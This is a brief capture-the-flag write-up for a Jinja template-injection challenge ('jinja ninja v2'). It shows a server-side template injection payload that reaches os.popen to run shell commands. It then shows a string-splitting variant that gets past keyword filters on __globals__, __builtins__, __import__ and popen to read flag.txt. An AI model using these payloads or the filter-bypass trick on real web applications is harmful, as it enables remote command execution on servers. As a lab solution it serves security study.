Skip to main content

jinja ninja v2

Solved by: Hanxoe

You think you are worthy enough? i dont think sooooooo :v

10.4.79.68:20008

author: anarchistx

Alright, we're diving back into a Jinja challenge, and this time the filters are trickier!

There are several filters we need to bypass, specifically on the strings __globals__, __builtins__, __import__, and the function call popen()

We need to transform this simple payload: {{request.application.__globals__.__builtins__.__import__('os').popen('ls ../').read()}} into a bypass payload, such as:

{{ request.application['__glo' + 'bals__']['__bui' + 'ltins__']['__im' + 'port__']('os')['po' + 'pen']('cat ../flag.txt')['re' + 'ad']() }}

And just send!!!🔫🔫

alt text

compit{j1nj4_1nj3ct10n_15_d4ng3r0u5_4nd_fun}